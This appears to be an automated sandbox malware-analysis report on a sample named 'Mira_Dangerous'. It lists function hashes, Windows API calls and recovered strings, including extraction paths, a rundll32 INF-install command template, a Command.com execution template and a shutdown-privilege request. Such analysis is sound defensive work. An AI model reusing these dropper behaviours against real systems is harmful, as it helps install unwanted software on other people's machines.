  • String ID: TMP4351$.TMP
  • API String ID: 3494564517-2619824408
  • Opcode ID: c8f4614371db3ca6a9d3f321fd37180daf8d29d03274309caa627389ef350ab6
  • Instruction ID: c3238a353d555b99468a7f8b43c57dfa8ae3b44217fb3b7db96c6dcadc65641f
  • Opcode Fuzzy Hash: c8f4614371db3ca6a9d3f321fd37180daf8d29d03274309caa627389ef350ab6
  • Instruction Fuzzy Hash: A631B3B1A0964187F710AB25A41037AFA50FB85BB5F8563B4DA6E03BE5CF3CD4068B18
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Message$Peek$DispatchMultipleObjectsWait
  • String ID:
  • API String ID: 2776232527-0
  • Opcode ID: 302dad1333796cede5321f5903fce61648418cd9c6d046aa706df1c59a6c2d53
  • Instruction ID: e652be52b28bcd0493df96bb3495e86607643a3da2b34e588e6d1a85c093c9d0
  • Opcode Fuzzy Hash: 302dad1333796cede5321f5903fce61648418cd9c6d046aa706df1c59a6c2d53
  • Instruction Fuzzy Hash: B9115472A29642C7E7A0AF30F454A76EA90FB95745F81A170D64A42994DF3CD048CF14
APIs
    • Part of subcall function 00007FF7A8CC3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7A8CC3A09), ref: 00007FF7A8CC3B64
    • Part of subcall function 00007FF7A8CC3B40: PeekMessageA.USER32 ref: 00007FF7A8CC3B89
    • Part of subcall function 00007FF7A8CC3B40: PeekMessageA.USER32 ref: 00007FF7A8CC3BCD
  • WriteFile.KERNELBASE ref: 00007FF7A8CC56E4
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: MessagePeek$FileMultipleObjectsWaitWrite
  • String ID:
  • API String ID: 1084409-0
  • Opcode ID: 5420669727f17c0981b348259a16efeb7c1a97139cf77fc2b0c1398b9072be99
  • Instruction ID: 9691c8ae33c1f10b32206b67bb3f8035eed1c2eb5101da499a3e582770876a2d
  • Opcode Fuzzy Hash: 5420669727f17c0981b348259a16efeb7c1a97139cf77fc2b0c1398b9072be99
  • Instruction Fuzzy Hash: 6E21C2A0A1A50282E7109F16E840735FB60FB84B94FD59274DA2D06AB5CF3CD054CF18
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
  • String ID:
  • API String ID: 2018477427-0
  • Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
  • Instruction ID: 50b04db940ba5aab8ccb904b849607e379de112d1c169247c383806e65dbe222
  • Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
  • Instruction Fuzzy Hash: 9911ACF1D0E64282F7506B10A5843B5E6E0FB45759FDA62B0D98C02AF5CF7DE485CB18
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CharPrev
  • String ID:
  • API String ID: 122130370-0
  • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
  • Instruction ID: 44b92f44265f48dae8c42ac872be3c8e98dae27bd6e787dd90a1c82ff481d449
  • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
  • Instruction Fuzzy Hash: B20149A190D7D286F3016F19A84436DFBA0E701BE0F99B2B0DB69077E5CF2CD4428B58
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CloseHandle
  • String ID:
  • API String ID: 2962429428-0
  • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
  • Instruction ID: ada5b055d8488618ddf1801208021bd9c1d2c0bcd573bba9fdb694791f63ffaf
  • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
  • Instruction Fuzzy Hash: DFF06271A19781C2DB1C5F25F580178F660FB48B59F465275DA2B46694CF3CD4D0CB24

Non-executed Functions

APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
  • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
  • API String ID: 383838535-2617288360
  • Opcode ID: 778cf6c626d3734d743f95605d23599f2518d83d8826cc93d245002d646ef5f5
  • Instruction ID: c7a3d21b0aa0f6e21cff79e76d04f179d37bea9c7dd2f58c84d1c48e80ab17c1
  • Opcode Fuzzy Hash: 778cf6c626d3734d743f95605d23599f2518d83d8826cc93d245002d646ef5f5
  • Instruction Fuzzy Hash: C7E116A2A0A78285EF11AF11D4102F9FBA0FB45744FD561B6DA8D037A4DF3CD90ACB14
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
  • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Mira
  • API String ID: 3530494346-768112549
  • Opcode ID: dd932c8b8010d96edb1f0d769f6f2aea78bdffa148ff81f52c238f49b3f208aa
  • Instruction ID: d1a71487c1f98fe526ed66888c45c8643b11596501f2d33eefee9830b7cd71de
  • Opcode Fuzzy Hash: dd932c8b8010d96edb1f0d769f6f2aea78bdffa148ff81f52c238f49b3f208aa
  • Instruction Fuzzy Hash: 8F7188E1E0A64286F750AB31B50437AEA51FB85B84FD6A1B0DA4E427B5CF3CD445CF28
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
  • String ID:
  • API String ID: 2168512254-0
  • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
  • Instruction ID: 1635b7a13b9a48b68b330ccb2e3258941ac17ecf966582e104d08cf4499729b4
  • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
  • Instruction Fuzzy Hash: 82513D72A05A41CAE710EF21E4541A9FBA4FB49B88F8261B5DA4E53764DF3CD844CB14
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
  • String ID: SeShutdownPrivilege
  • API String ID: 2829607268-3733053543
  • Opcode ID: a8a6f1147a46118fc027226cec057dd4a819a4cb88a69f63fe7e4033c388a577
  • Instruction ID: f34e0cd1e2dc8edb5e0398b8b035b7b92deebc69b65f69c64d8fe250b8ff3319
  • Opcode Fuzzy Hash: a8a6f1147a46118fc027226cec057dd4a819a4cb88a69f63fe7e4033c388a577
  • Instruction Fuzzy Hash: A021C3B2A19642C7E710AB20E05537AFB60FB89745F82A1B5E64E03B64CF3CD048CF18
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
  • String ID:
  • API String ID: 4104442557-0
  • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
  • Instruction ID: a2e5ad0bf49d266fe0f8b2ddbeda979ced41c4e712dc11d8067b0d3c639810df
  • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
  • Instruction Fuzzy Hash: C8116072A15F418AEB00EF71E8442A8B3A4FB09758F811A70EA6D47B64DF7CD168C754
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: ExceptionFilterUnhandled
  • String ID:
  • API String ID: 3192549508-0
  • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
  • Instruction ID: 857d5a6b265e7f73ef3693e110052fcef879feb1418a97ee8cbcf0f48585e4a0
  • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
  • Instruction Fuzzy Hash: B2B09250E36802C1D604BB219C8906193A0BB58305FC218B0C00E80170EE2C92AA8B14
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
  • String ID: "$:$@$RegServer
  • API String ID: 1203814774-4077547207
  • Opcode ID: 12e526643e99c6bb7d7205562943e2c704484fdb71f38b6add3df85e74ee9651
  • Instruction ID: 97471e0229723035f689c78a49dc4119c20b25c5046b58ebf4d60b7a49b65180
  • Opcode Fuzzy Hash: 12e526643e99c6bb7d7205562943e2c704484fdb71f38b6add3df85e74ee9651
  • Instruction Fuzzy Hash: A602F6E1E0E69281FA60AB2C5404279EBB1EF41750FDA61B5D95E067B5CF3DE402CF28
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
  • String ID: $Mira
  • API String ID: 2654313074-2347440036
  • Opcode ID: b4fcab3b6f490310a2b8cce2bae229ee8661eef1c6ec9abe373251f3728e1e1d
  • Instruction ID: 8c567689f1111c8ade9326644b555ba8ceda5fa36a262a4cd42c275c33542b04
  • Opcode Fuzzy Hash: b4fcab3b6f490310a2b8cce2bae229ee8661eef1c6ec9abe373251f3728e1e1d
  • Instruction Fuzzy Hash: 3A5167B190A642C6E710AB21F954279FB61FB89B55FC6A2B1D91D03BB4CF3C9045CF18
APIs
  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4A86
  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4AAA
  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4ACA
  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4AEC
  • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4B1B
  • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4B3A
  • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4B54
  • FreeLibrary.KERNEL32 ref: 00007FF7A8CC4BF1
  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4C0D
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
  • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
  • API String ID: 1865808269-1731843650
  • Opcode ID: c7278db8e3c9b7a084eb1c0e71fd963677ce82b26fa1d552b37908be2e989bde
  • Instruction ID: d7c2e3cd887532de82b4da98343d55a14f13dea554a21bd667c9fe3f8b506ad0
  • Opcode Fuzzy Hash: c7278db8e3c9b7a084eb1c0e71fd963677ce82b26fa1d552b37908be2e989bde
  • Instruction Fuzzy Hash: 2B5195A5A0EB4286E740AB11B410179FBA0FB49B91FC6A1B5DD8E037B4DF3CD449CB18
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
  • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
  • API String ID: 2659952014-2428544900
  • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
  • Instruction ID: 762965d69ec28327c824ea97269d181c959599df861fb806e60553102c65024d
  • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
  • Instruction Fuzzy Hash: 2E51A7B260968186EB10DF11E8542BAFBA1FB89B90F9661B1DA4E03764DF3CD449CF14
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
  • String ID: Mira
  • API String ID: 3785188418-679536105
  • Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
  • Instruction ID: 184955916c7b20abb6434de9160eea39ce65bf66f2f42202b39e975f8b74df7d
  • Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
  • Instruction Fuzzy Hash: 1D3126B5906642C6E610AB25F4042B5FB61FB8AB51FC6B3B0D91E067B4CF3D9049CE18
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
  • String ID: Control Panel\Desktop\ResourceLocale
  • API String ID: 3346862599-1109908249
  • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
  • Instruction ID: 49961eb43dfd661a4ffb6333bae302219d3345a02baf0563b94889595de9d0b2
  • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
  • Instruction Fuzzy Hash: F851A4B2A0AA41CAEB509B24E4401BEF7A1FB88B50FC661B1DA5D037A4DF3CE555CF14
APIs
Strings
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
  • String ID: CheckTokenMembership$advapi32.dll
  • API String ID: 4204503880-1888249752
  • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
  • Instruction ID: 665c66a6acf8bbd35da88037dcef619b3370e8645e0c7cc5b62fa81746ba46f9
  • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
  • Instruction Fuzzy Hash: CE314D76609B458AD6109F16F4401AAFBA0FB89B80F866179DE8E43724DF3CE449CF14
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
  • String ID:
  • API String ID: 1051330783-0
  • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
  • Instruction ID: 2427cf3b67ea492b0f13f3f01a7074ea6a9682d78a5359d5819609eaeeee5484
  • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
  • Instruction Fuzzy Hash: 66517972A06642CAEB50AF1594005B8F7A4FB48B94F96A171DE0D63764EF3CE445CB24
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
  • String ID:
  • API String ID: 975904313-0
  • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
  • Instruction ID: e2ab0b7fbe955e241627f5a410c9929f3a2ff5fdafb25b69958fb8027e56e38e
  • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
  • Instruction Fuzzy Hash: 0B51CBA1A0E6C545FB216F2594103B8EF91FB49B90F89A1F1CA8E077A5DE3CD4458B28
APIs
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
